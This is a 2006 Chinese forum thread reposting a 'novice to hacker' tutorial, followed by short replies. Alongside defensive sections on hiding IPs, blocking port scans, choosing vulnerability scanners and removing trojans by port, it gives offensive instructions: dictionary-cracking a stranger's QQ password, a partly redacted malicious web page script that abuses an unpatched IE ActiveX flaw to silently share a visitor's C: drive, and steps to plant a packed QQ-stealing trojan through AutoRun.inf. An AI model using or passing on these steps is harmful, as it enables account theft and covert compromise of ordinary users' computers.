飘云阁

 找回密码
 加入我们

QQ登录

只需一步,快速开始

12
返回列表 发新帖
楼主: 广陵寒

菜 鸟 变 黑 客 终 极 教 程

[复制链接]
  • TA的每日心情
    开心
    2019-10-21 20:32
  • 签到天数: 3 天

    [LV.2]偶尔看看I

     楼主| 发表于 2006-2-9 00:27:59 | 显示全部楼层
    菜鸟黑客入门攻击及防范技巧


    在正式进行各种“黑客行为”之前,黑客会采取各种手段,探测(也可以说“侦察”)对方的主机信息,以便决定使用何种最有效的方法达到自己的目的。来看看黑客是如何获知最基本的网络信息——对方的IP地址;以及用户如何防范自己的IP泄漏。

    ■ 获取IP

    “IP”作为Net用户的重要标示,是黑客首先需要了解的。获取的方法较多,黑客也会因不同的网络情况采取不同的方法,如:在局域网内使用Ping指令,Ping对方在网络中的名称而获得IP;在Internet上使用IP版的QQ直接显示。而最“牛”,也是最有效的办法是截获并分析对方的网络数据包。如图1所示,这是用Windows 2003的网络监视器捕获的网络数据包,可能一般的用户比较难看懂这些16进制的代码,而对于了解网络知识的黑客,他们可以找到并直接通过软件解析截获后的数据包的IP包头信息,再根据这些信息了解具体的IP。



    ■ 隐藏IP

    虽然侦察IP的方法多样,但用户可以隐藏IP的方法同样多样。就拿对付最有效的“数据包分析方法”而言,就可以安装能够自动去掉发送数据包包头IP信息的“Norton Internet Security 2003”。不过使用“Norton Internet Security”有些缺点,譬如:它耗费资源严重,降低计算机性能;在访问一些论坛或者网站时会受影响;不适合网吧用户使用等等。现在的个人用户采用最普及隐藏IP的方法应该是使用代理,由于使用代理服务器后,“转址服务”会对发送出去的数据包有所修改,致使“数据包分析”的方法失效。一些容易泄漏用户IP的网络软件(QQ、MSN、IE等)都支持使用代理方式连接Internet,特别是QQ使用“ezProxy”等代理软件连接后,IP版的QQ都无法显示该IP地址。这里笔者介绍一款比较适合个人用户的简易代理软件——网络新手IP隐藏器(如图2),只要在“代理服务器”和“代理服务器端”填入正确的代理服务器地址和端口,即可对http使用代理,比较适合由于IE和QQ泄漏IP的情况。

    不过使用代理服务器,同样有一些缺点,如:会影响网络通讯的速度;需要网络上的一台能够提供代理能力的计算机,如果用户无法找到这样的代理服务器就不能使用代理(查找代理服务器时,可以使用“代理猎手”等工具软件扫描网络上的代理服务器)。

    虽然代理可以有效地隐藏用户IP,但高深的黑客亦可以绕过代理,查找到对方的真实IP地址,用户在何种情况下使用何种方法隐藏IP,也要因情况而论。



    黑客的探测方式里除了侦察IP,还有一项——端口扫描。通过“端口扫描”可以知道被扫描的计算机哪些服务、端口是打开而没有被使用的(可以理解为寻找通往计算机的通道)。

    一、端口扫描

    网上很容易找到远程端口扫描的工具,如Superscan、IP Scanner、Fluxay(流光)等(如图1),这就是用“流光”对试验主机192.168.1.8进行端口扫描后的结果。从中我们可以清楚地了解,该主机的哪些非常用端口是打开的;是否支持FTP、Web服务;且FTP服务是否支持“匿名”,以及IIS版本,是否有可以被成功攻破的IIS漏洞也显示出来。



    二、阻止端口扫描
    防范端口扫描的方法有两个:
    1. 关闭闲置和有潜在危险的端口

    这个方法有些“死板”,它的本质是——将所有用户需要用到的正常计算机端口外的其他端口都关闭掉。因为就黑客而言,所有的端口都可能成为攻击的目标。换句话说“计算机的所有对外通讯的端口都存在潜在的危险”,而一些系统必要的通讯端口,如访问网页需要的HTTP(80端口);QQ(4000端口)等不能被关闭。

    在Windows NT核心系统(Windows 2000/XP/ 2003)中要关闭掉一些闲置端口是比较方便的,可以采用“定向关闭指定服务的端口”和“只开放允许端口的方式”。计算机的一些网络服务会有系统分配默认的端口,将一些闲置的服务关闭掉,其对应的端口也会被关闭了(如图2)。进入“控制面板”、“管理工具”、“服务”项内,关闭掉计算机的一些没有使用的服务(如FTP服务、DNS服务、IIS Admin服务等等),它们对应的端口也被停用了。至于“只开放允许端口的方式”,可以利用系统的“TCP/IP筛选”功能实现,设置的时候,“只允许”系统的一些基本网络通讯需要的端口即可(关于“TCP/IP的筛选”,请参看本期应用专题)。



    2. 检查各端口,有端口扫描的症状时,立即屏蔽该端口

    这种预防端口扫描的方式显然用户自己手工是不可能完成的,或者说完成起来相当困难,需要借助软件。这些软件就是我们常用的网络防火墙。

    防火墙的工作原理是:首先检查每个到达你的电脑的数据包,在这个包被你机上运行的任何软件看到之前,防火墙有完全的否决权,可以禁止你的电脑接收Internet上的任何东西。当第一个请求建立连接的包被你的电脑回应后,一个“TCP/IP端口”被打开;端口扫描时,对方计算机不断和本地计算机建立连接,并逐渐打开各个服务所对应的“TCP/IP端口”及闲置端口,防火墙经过自带的拦截规则判断,就能够知道对方是否正进行端口扫描,并拦截掉对方发送过来的所有扫描需要的数据包。

    现在市面上几乎所有网络防火墙都能够抵御端口扫描,在默认安装后,应该检查一些防火墙所拦截的端口扫描规则是否被选中,否则它会放行端口扫描,而只是在日志中留下信息而已。

    黑客在进行攻击前的准备工作,就此介绍完毕。在以后的内容中,将转入正式的入侵、窃取和攻击等具体的介绍。

    上网了吧,用Q了吧,被盗了吧,正常。想上网吧,想用Q吧,不想被盗Q吧,正常。那就来了解一些盗QQ方面的知识吧!

    一、名词解释

    1.字典

    所谓字典,其实就是一个包含有许多密码的文本文件。字典的生成有两种方式:用字典软件生成和手动添加。一般字典软件能生成包含生日、电话号码、常用英文名等密码的字典,不过由于这样生成的字典体积大,而且不灵活,所以黑客往往会手动添加一些密码到字典里去,形成一个“智能化”的密码文件。

    2.暴力破解

    所谓暴力破解,其实就是用无数的密码来与登录QQ的密码进行核对,直到相同为止。暴力破解这种方法不仅可以运用在盗QQ上,在破解其它密码时也常用这种方法,如:破解系统管理员密码等。这是最常用的一种破解方式。

    二、原理分析

    现在盗QQ的软件有两种,本地破解和远程破解。看起来好像挺神秘的,其实说穿了就那么回事。下面咱们先来看看本地破解。

    1.本地破解

    本地破解其实就是用软件选择一个在本地登录过的QQ号码,然后挂上字典进行密码核对。本地破解也可分为两种:暴力破解和本地记录。而暴力破解又分为两种:按顺序增加和通过字典对比。比如现在我要破解QQ号为123456的密码,我可以用1作为密码进行核对,如果正确就可以盗走该号了,如果不正确,则用2来核对,还不正确,则用3,以此顺序增加,直到和密码相同为止。不过这样的破解效率是很低的,因为许多人的密码并不只是数字,所以这种方法并不常见。

    平时常用的是通过对比字典中密码的方法,如果正确就盗走QQ。因为字典可以做得很“智能化”,所以这种破解效率相对较高,特别是当你的密码是简单的数字,或是数字加一些英文名时特别明显。举个例子,比如我在网吧看到一MM的英文名为alice,密码位数为8位(我怎么知道的?晕!偷看到的嘛!)。从常理来讲,一般她的密码就是alice加上一些数字。于是我可以用易优超级字典生成器制作这样一个字典:把alice做为特殊字符排在密码的第1-5位(如图1),然后把基本字符里的数字全部选上,再将密码位数设为8,然后选好保存位置点“生成字典”。


    图1

    打开生成的字典,你就可以看到alice000、alice001等密码了(如图2)。然后就是把alice放在第2-6位,第3-7位,第4-8位,其它位置同样用数字填满。接下来我只要用软件把这些字典挂上进行破解,很快就可以得到QQ密码了。



    ===============================================

    黑客通过网页窃取QQ方法


    要想偷别人的QQ,方法有很多了。利用恶意网页使对方的电脑被共享出来是很有趣的一招。方法是:在你的网站网页中加入如下内容的代码:

    ------------------------------------------------------------------------

    <script language=Java Script>
    document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    function f()
    {*********************];
    al.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    al.createlnstance()
    Shl=al.GetObject() Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Flafgs",302,"REG_DWORD");
    Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Type",0,"REG_DWORD");
    Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Path","C://");}
    function init()
    {setTimeout("f()",1000);}
    {********************}
    init()
    </script>
    -------------------------------------

    上面的代码大家一定很容易读懂,简单说来就是通过修改对方注册表中的键值,把对方的C盘共享出来,如果想让对方的其他盘都共享请自行设置。

    述代码中{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代表Windows Scripting Host(WSH)的外壳对象。WSH是微软提供的一种基于32位Windows平台的、与语言无关的脚本解释机制,它使得脚本能够直接在Windows桌面或命令提示符下运行。WSH使得脚本可以被执行,就象执行批处理一样。以“Shl.RegWrite”开头的这几句代码的作用是写入浏览者的注册表,就是它们使得对方的硬盘被共享的。把“Flags”的键值设为00000302可以隐藏共享,使对方无法发现,非常隐蔽。

    网页做好后,把它上传你的主页空间,骗他浏览你的网页(就看你的嘴皮子功夫了),如果对方的IE没有打补丁(网上这样的电脑有很多),就可以把他的C盘共享出来。整个方法的原理就是把com.ms.activeX.ActiveXComponent对象嵌入<APPLET>标记中,这样会导致任意创建和解释执行ActiveX对象,使我们可以创建任意文件、运行程序、写注册表。未打补丁的IE,在打开含有上述代码的网页时不会有任何警告,我们就是利用这个漏洞把对方的硬盘被共享出来。

    等对方中招后,就把对方的硬盘映射过来,可以使用net use命令,也可以使用网络刺客II等软件。下一步可以给对方植入一个盗QQ的软件,比方说QQ杀手等,注意一定要用ASPack或其他加壳软件给木马加壳(其实就是另类“压缩”),防止杀毒软件发现。

    最后,打开记事本键入以下内容:
    [AutoRun]
    open=winnt32.exe

    保存为AutoRun.inf,其中的winnt32.exe为木马文件。把AutoRun.inf和winnt32.exe一起拷到对方某分区的根目录下。这样,只要他双击该分区就会中木马!这样可以大大的增加木马运行的主动性!须知许多人现在都非常警惕,不熟悉的文件他们轻易的不会运行,而这种方法就很难防范了。

    以后,你就等着用邮箱收信收对方的QQ密码吧。

    注意,本文只是技术交流,大家不要随意盗取别人的QQ。同时为了保障安全我们没有完全刊登源代码。敬请原谅!

    ===================================


    选择漏洞扫描工具


    对于一个复杂的多层结构的系统和网络安全规划来说,隐患扫描是一项重要的组成元素。隐患扫描能够模拟黑客的行为,对系统设置进行攻击测试,以帮助管理员在黑客攻击之前,找出网络中存在的 漏洞。这样的工具可以远程评估你的网络的安全级别,并生成评估报告,提供相应的整改措施。

    目前,市场上有很多隐患扫描工具,按照不同的技术(基于网络的、基于主机的、基于代理的、C/S的)、不同的特征、不同的报告方法,以及不同的监听模式,可以分成好几类。不同的产品之间,漏洞检测的准确性差别较大,这就决定了生成的报告的有效性上也有很大区别。

    选择正确的隐患扫描工具,对于提高你的系统的安全性,非常重要。

    1、漏洞扫描概述

    在字典中,Vulnerability意思是漏洞或者缺乏足够的防护。在军事术语中,这个词的意思更为明确,也更为严重------有受攻击的嫌疑。

    每个系统都有漏洞,不论你在系统安全性上投入多少财力,攻击者仍然可以发现一些可利用的特征和配置缺陷。这对于安全管理员来说,实在是个不利的消息。但是,多数的攻击者,通常做的是简单的事情。发现一个已知的漏洞,远比发现一个未知漏洞要容易的多,这就意味着:多数攻击者所利用的都是常见的漏洞,这些漏洞,均有书面资料记载。

    ⑤ 生成的报告的特性(内容是否全面、是否可配置、是否可定制、报告的格式、输出方式等);

    ⑥ 对于漏洞修复行为的分析和建议(是否只报告存在哪些问题、是否会告诉您应该如何修补这些漏洞);

    ⑦ 安全性(由于有些扫描工具不仅仅只是发现漏洞,而且还进一步自动利用这些漏洞,扫描工具自身是否会带来安全风险);

    ⑧ 性能;
    ⑨ 价格结构

    这样的话,采用适当的工具,就能在黑客利用这些常见漏洞之前,查出网络的薄弱之处。如何快速简便地发现这些漏洞,这个非常重要。

    漏洞,大体上分为两大类:
    ① 软件编写错误造成的漏洞;
    ② 软件配置不当造成的漏洞。

    漏洞扫描工具均能检测以上两种类型的漏洞。漏洞扫描工具已经出现好多年了,安全管理员在使用这些工具的同时,黑客们也在利用这些工具来发现各种类型的系统和网络的漏洞。

    入侵是重要的第一步。当您迈出了这一步后,接下来的是:如何选择满足您公司需要的合适的隐患扫描技术,这同样也很重要。以下列出了一系列衡量因素:

    ① 底层技术(比如,是被动扫描还是主动扫描,是基于主机扫描还是基于网络扫描);
    ② 特性;
    ③ 漏洞库中的漏洞数量;
    ④ 易用性;

    2.1 底层技术

    比较漏洞扫描工具,第一是比较其底层技术。你需要的是主动扫描,还是被动扫描;是基于主机的扫描,还是基于网络的扫描,等等。一些扫描工具是基于Internet的,用来管理和集合的服务器程序,是运行在软件供应商的服务器上,而不是在客户自己的机器上。这种方式的优点在于检测方式能够保证经常更新,缺点在于需要依赖软件供应商的服务器来完成扫描工作。

    扫描古城可以分为"被动"和"主动"两大类。被动扫描不会产生网络流量包,不会导致目标系统崩溃,被动扫描工具对正常的网络流量进行分析,可以设计成"永远在线"检测的方式。与主动扫描工具相比,被动扫描工具的工作方式,与网络监控器或IDS类似。

    主动扫描工具更多地带有"入侵"的意图,可能会影响网络和目标系统的正常操作。他们并不是持续不断运行的,通常是隔一段时间检测一次。

    基于主机的扫描工具需要在每台主机上安装代理(Agent)软件;而基于网络的扫描工具则不需要。基于网络的扫描工具因为要占用较多资源,一般需要一台专门的计算机。

    如果网络环境中含有多种操作系统,您还需要看看扫描其是否兼容这些不同的操作系统(比如Microsoft、Unix以及Netware等)。

    2.2 管理员所关心的一些特性

    通常,漏洞扫描工具完成一下功能:扫描、生成报告、分析并提出建议,以及数据管理。在许多方面,扫描是最常见的功能,但是信息管理和扫描结果分析的准确性同样很重要。另外要考虑的一个方面是通知方式:当发现漏洞后,扫描工具是否会向管理员报警?采用什么方式报警?

    对于漏洞扫描软件来说,管理员通常关系以下几个方面:

    ① 报表性能好;
    ② 易安装,易使用;
    ③ 能够检测出缺少哪些补丁;
    ④ 扫描性能好,具备快速修复漏洞的能力;
    ⑤ 对漏洞及漏洞等级检测的可*性;
    ⑥ 可扩展性;
    ⑦ 易升级性;
    ⑧ 性价比好;

    2.3 漏洞库

    只有漏洞库中存在相关信息,扫描工具才能检测到漏洞,因此,漏洞库的数量决定了扫描工具能够检测的范围。

    然而,数量并不意味着一切,真正的检验标准在于扫描工具能否检测出最常见的漏洞?最根本的在于,扫描工具能否检测出影响您的系统的那些漏洞?扫描工具中有用的总量取决于你的网络设备和系统的类型。你使用扫描工具的目的是利用它来检测您的特定环境中的漏洞。如果你有很多Netware服务器,那么,不含Netware漏洞库的扫描工具就不是你的最佳选择。

    当然,漏洞库中的攻击特性必须经常升级,这样才能检测到最近发现的安全漏洞。

    2.4 易使用性

    一个难以理解和使用的界面,会阻碍管理员使用这些工具,因此,界面友好性尤为重要。不同的扫描工具软件,界面也各式各样,从简单的基于文本的,到复杂的图形界面,以及Web界面。

    2.5 扫描报告

    对管理员来说,扫描报告的功能越来越重要,在一个面向文档的商务环境中,你不但要能够完成你的工作,而且还需要提供书面资料说明你是怎样完成的。事实上,一个扫描可能会得到几百甚至几千个结果,但是这些数据是没用的,除非经过整理,转换成可以为人们理解的信息。这就意味着理想情况下,扫描工具应该能够对这些数据进行分类和交*引用,可以导到其他程序中,或者转换成其他格式(比如CSV,HTML,XML,MHT,MDB,EXCEL以及Lotus等等),采用不同方式来展现它,并且能够很容易的与以前的扫描结果做比较。

    漏洞,才完成一半工作。一个完整的方案,同时将告诉你针对这些漏洞将采取哪些措施。一个好的漏洞扫描工具会对扫描结果进行分析,并提供修复建议。一些扫描工具将这些修复建议整合在报告中,另外一些则提供产品网站或其它在线资源的链接。

    漏洞修复工具,它可以和流行的扫描工具结合在一起使用,对扫描结果进行汇总,并自动完成修复过程。

    2.7 分析的准确性

    只有当报告的结果是精确的,提供的修复建议是有效的,一份包含了详细漏洞修复建议的报告, 才算是一份优秀的报告。一个好的扫描工具必须具有很低的误报率(报告出的漏洞实际上不存在)和漏报率(漏洞存在,但是没有检测到)。

    2.8 安全问题

    因扫描工具而造成的网络瘫痪所引起的经济损失,和真实攻击造成的损失是一样的,都非常巨大。一些扫描工具在发现漏洞后,会尝试进一步利用这些漏洞,这样能够确保这些漏洞是真实存在的,进而消除误报的可能性。但是,这种方式容易出现难以预料的情况。在使用具备这种功能的扫描工具的时候,需要格外小心,最好不要将其设置成自动运行状态。

    扫描工具可能造成网络失效的另一种原因,是扫描过程中,超负荷的数据包流量造成拒绝服务(DOS,Denial Of Service)。为了防止这一点,需要选择好适当的扫描设置。相关的设置项有:并发的线程数、数据包间隔时间、扫描对象总数等,这些项应该能够调整,以便使网络的影响降到最低。一些扫描工具还提供了"安全扫描"的模板,以防止造成对目标系统的损耗。

    2.9 性能

    扫描工具运行的时候,将占用大量的网络带宽,因此,扫描过程应尽快完成。当然,漏洞库中的漏洞数越多,选择的扫描模式越复杂,扫描所耗时间就越长,因此,这只是个相对的数值。提高性能的一种方式,是在企业网中部署多个扫描工具,将扫描结果反馈到一个系统中,对扫描结果进行汇总。

    3、隐患扫描工具的价格策略

    商业化的扫描工具通常按以下几种方式来发布器授权许可证:按IP地址授权,按服务器授权,按管理员授权。不同的授权许可证方式有所区别。

    3.1 按IP段授权

    许多扫描其产品,比如eEye的Retina和ISS(Internet Security Scanner)要求企业用户按照IP段或IP范围来收费。换句话说,价格取决于所授权的可扫描的IP地址的数目。

    3.2 按服务器授权


    一些扫描工具供应商,按照每个服务器/每个工作站来计算器许可证的价格。服务器的授权价格会比工作站高很多,如果有多台服务器的话,扫描工具的价格会明显上升。

    3.3 按管理员授权

    对于大多数企业而言,这种授权方式,比较简单,性价比也较好。

    4、总结

    在现在的互联网环境中,威胁无处不在。为了防范攻击,第一件事就是在黑客发动攻击之前,发现网络和系统中的漏洞,并及时修复。

    但是,漏洞扫描工具在特性、精确性、价格以及可用性上差别较大,如何选择一个正确的隐患扫描工具,尤为重要。


    =====================================================


    黑客及木马攻击常见端口的关闭

    以下列出的端口仅为相关木马程序默认情况下开放的端口,请根据具体情况采取相应的操作:

    707端口的关闭:

    这个端口开放表示你可能感染了nachi蠕虫病毒,该蠕虫的清除方法如下:

    1、停止服务名为WinS Client和Network Connections Sharing的两项服务

    2、删除c:WinntSYSTEM32WinS目录下的DLLHOST.EXE和SVCHOST.EXE文件

    3、编辑注册表,删除HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices项中名为RpcTftpd和RpcPatch的两个键值

    1999端口的关闭:

    这个端口是木马程序BackDoor的默认服务端口,该木马清除方法如下:

    1、使用进程管理工具将notpa.exe进程结束

    2、删除c:Windows目录下的notpa.exe程序

    3、编辑注册表,删除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion

    Run项中包含c:Windows otpa.exe /o=yes的键值

    2001端口的关闭:

    这个端口是木马程序黑洞2001的默认服务端口,该木马清除方法如下:

    1、首先使用进程管理软件将进程Windows.exe杀掉

    2、删除c:Winntsystem32目录下的Windows.exe和S_Server.exe文件

    3、编辑注册表,删除HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

    RunServices项中名为Windows的键值

    4、将HKEY_CLASSES_ROOT和HKEY_LOCAL_MACHINESoftwareCLASSES项中的Winvxd项删除

    5、修改HKEY_CLASSES_ROOT xtfileshellopencommand项中的
    c:Winntsystem32S_SERVER.EXE %1为C:WinNTNOTEPAD.EXE %1

    6、修改HKEY_LOCAL_MACHINESoftwareCLASSES xtfileshellopencommand

    项中的c:Winntsystem32S_SERVER.EXE %1键值改为 C:WinNTNOTEPAD.EXE %1

    2023端口的关闭:

    这个端口是木马程序Ripper的默认服务端口,该木马清除方法如下:

    1、使用进程管理工具结束sysrunt.exe进程

    2、删除c:Windows目录下的sysrunt.exe程序文件

    3、编辑system.ini文件,将shell=explorer.exe sysrunt.exe 改为shell=explorer.exe后保存

    4、重新启动系统

    2583端口的关闭:

    这个端口是木马程序Wincrash v2的默认服务端口,该木马清除方法如下:

    1、编辑注册表,删除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion

    Run项中的WinManager = "c:Windowsserver.exe"键值

    2、编辑Win.ini文件,将run=c:Windowsserver.exe改为run=后保存退出

    3、重新启动系统后删除C:Windowssystem SERVER.EXE

    3389端口的关闭:

    首先说明3389端口是Windows的远程管理终端所开的端口,它并不是一个木马程序,请先确定该服务是否是你自己开放的。如果不是必须的,请关闭该服务。

    Win2000关闭的方法:

    1、Win2000server 开始-->程序-->管理工具-->服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。

    2、Win2000pro开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。

    Winxp关闭的方法:

    在我的电脑上点右键选属性-->远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。

    4444端口的关闭:

    如果发现你的机器开放这个端口,可能表示你感染了msblast蠕虫,清除该蠕虫的方法如下:

    1、使用进程管理工具结束msblast.exe的进程

    2、编辑注册表,删除HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun

    项中的"Windows auto update"="msblast.exe"键值

    3、删除c:Winntsystem32目录下的msblast.exe文件

    4899端口的关闭:

    首先说明4899端口是一个远程控制软件(remote administrator)服务端监听的端口,他不能算是一个木马程序,但是具有远程控制功能,通常杀毒软件是无法查出它来的,请先确定该服务是否是你自己开放并且是必需的。如果不是请关闭它。

    关闭4899端口:

    1、请在开始-->运行中输入cmd(98以下为command),然后 cd C:Winntsystem32(你的系统安装目录),输入r_server.exe /stop后按回车。

    然后在输入r_server /uninstall /silence

    2、到C:Winntsystem32(系统目录)下删除r_server.exe admdll.dll

    raddrv.dll三个文件

    5800,5900端口:

    首先说明5800,5900端口是远程控制软件VNC的默认服务端口,但是VNC在修改过后会被用在某些蠕虫中。

    请先确认VNC是否是你自己开放并且是必须的,如果不是请关闭

    关闭的方法:

    1、首先使用fport命令确定出监听在5800和5900端口的程序所在位置(通常会是c:Winntfont***plorer.exe)

    2、在任务管理器中杀掉相关的进程(注意有一个是系统本身正常的,请注意!如果错杀可以重新运行c:Winntexplorer.exe)

    3、删除C:Winntfonts中的explorer.exe程序。

    4、删除注册表HKEY_LOCAL_MACHINESoftwareMicrosoftWindows

    CurrentVersionRun项中的Explorer键值。

    5、重新启动机器。

    6129端口的关闭:

    首先说明6129端口是一个远程控制软件(dameware nt utilities)服务端监听得端口,他不是一个木马程序,但是具有远程控制功能,通常的杀毒软件是无法查出它来的。请先确定该服务是否是你自己安装并且是必需的,如果不是请关闭

    关闭6129端口:

    1、选择开始-->设置-->控制面板-->管理工具-->服务

    找到DameWare Mini Remote Control项点击右键选择属性选项,将启动类型改成禁用后停止该服务。

    2、到c:Winntsystem32(系统目录)下将DWRCS.EXE程序删除。

    3、到注册表内将HKEY_LOCAL_MACHINESYSTEMControlSet001Services项中的DWRCS键值删除

    6267端口的关闭:

    6267端口是木马程序广外女生的默认服务端口,该木马删除方法如下:

    1、启动到安全模式下,删除c:Winntsystem32下的DIAGFG.EXE文件

    2、到c:Winnt目录下找到regedit.exe文件,将该文件的后缀名改为.com

    3、选择开始-->运行输入regedit.com进入注册表编辑页面

    4、修改HKEY_CLASSES_ROOTexefileshellopencommand项的键值为
    "%1" %*

    5、删除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRunServices项中名字为Diagnostic Configuration的键值

    6、将c:Winnt下的regedit.com改回到regedit.exe
    6670、6771端口的关闭:

    这些端口是木马程序DeepThroat v1.0 - 3.1默认的服务端口,清除该木马的方法如下:

    1、编辑注册表,删除HKEY_LOCAL_MACHINESOFTWAREMicroSoftWindowsCurrentVersion

    Run项中的‘System32‘=c:Windowssystem32.exe键值(版本1.0)或‘SystemTray‘ = ‘Systray.exe‘ 键值(版本2.0-3.0)键值

    3、重新启动机器后删除c:Windowssystem32.exe(版本1.0)或c:Windowssystemsystray.exe(版本2.0-3.0)

    6939 端口的关闭:

    这个端口是木马程序Indoctrination默认的服务端口,清除该木马的方法如下:

    1、编辑注册表,删除

    HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
    CurrentVersionRun
    HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
    CurrentVersionRunServices
    HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
    CurrentVersionRunOnce
    HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
    CurrentVersionRunServicesOnce

    四项中所有包含Msgsrv16 ="msgserv16.exe"的键值

    2、重新启动机器后删除C:Windowssystem目录下的msgserv16.exe文件

    6969端口的关闭:

    这个端口是木马程序PRIORITY的默认服务端口,清除该木马的方法如下:

    1、编辑注册表,删除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
    Run Services项中的"PServer"= C:WindowsSystemPServer.exe键值
    2、重新启动系统后删除C:WindowsSystem目录下的PServer.exe文件

    7306端口的关闭:

    这个端口是木马程序网络精灵的默认服务端口,该木马删除方法如下:

    1、你可以使用fport察看7306端口由哪个程序监听,记下程序名称和所在的路径

    2、如果程序名为Netspy.exe,你可以在命令行方式下到该程序所在目录输入命令Netspy.exe /remove来删除木马

    3、如果是其他名字的程序,请先在进程中结束该程序的进程,然后到相应目录下删除该程序。

    4、编辑注册表,将HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRun项和HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRunServices项中与该程序有关的键值删除

    7511端口的关闭:

    7511是木马程序聪明基因的默认连接端口,该木马删除方法如下:

    1、首先使用进程管理工具杀掉MBBManager.exe这个进程

    2、删除c:Winnt(系统安装目录)中的MBBManager.exe和Explore32.exe程序文件,删除c:Winntsystem32目录下的editor.exe文件

    3、编辑注册表,删除注册表HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion

    Run项中内容为C:WinNTMBBManager.exe键名为MainBroad BackManager的项。

    4、修改注册表HKEY_CLASSES_ROOT xtfileshellopencommand中的c:Winntsystem32editor.exe %1改为c:WinntNOTEPAD.EXE %1

    5、修改注册表HKEY_LOCAL_MACHINESoftwareCLASSEShlpfileshellopencommand

    项中的C:WinNTexplore32.exe %1键值改为C:WinNTWinHLP32.EXE %1

    7626端口的关闭:

    7626是木马冰河的默认开放端口(这个端口可以改变),木马删除方法如下:

    1、启动机器到安全模式下,编辑注册表,删除HKE
    PYG19周年生日快乐!
  • TA的每日心情
    开心
    2019-10-21 20:32
  • 签到天数: 3 天

    [LV.2]偶尔看看I

     楼主| 发表于 2006-2-9 00:29:00 | 显示全部楼层
    文中的插图我就没加了.
    PYG19周年生日快乐!
  • TA的每日心情
    开心
    2019-4-13 15:40
  • 签到天数: 52 天

    [LV.5]常住居民I

    发表于 2006-2-9 09:21:45 | 显示全部楼层
    广陵寒 .. 我来了..!
    这个论坛蛮好的..! 我喜欢..!呵呵
    PYG19周年生日快乐!
  • TA的每日心情
    开心
    2019-10-21 20:32
  • 签到天数: 3 天

    [LV.2]偶尔看看I

     楼主| 发表于 2006-2-10 04:09:30 | 显示全部楼层
    来了就好,这里能让你学很多东西的,他们都很热心的.校盟斑竹当累了,可在这里学一下的,学无止境嘛!
    PYG19周年生日快乐!

    该用户从未签到

    发表于 2006-3-16 17:26:05 | 显示全部楼层
    太长了.收藏先.下次再看
    PYG19周年生日快乐!

    该用户从未签到

    发表于 2006-7-19 21:28:50 | 显示全部楼层
    辛苦了
    为你感到骄傲
    PYG19周年生日快乐!
  • TA的每日心情
    开心
    2020-6-1 22:53
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2006-7-21 13:06:23 | 显示全部楼层
    楼主好手力
    PYG19周年生日快乐!
    您需要登录后才可以回帖 登录 | 加入我们

    本版积分规则

    快速回复 返回顶部 返回列表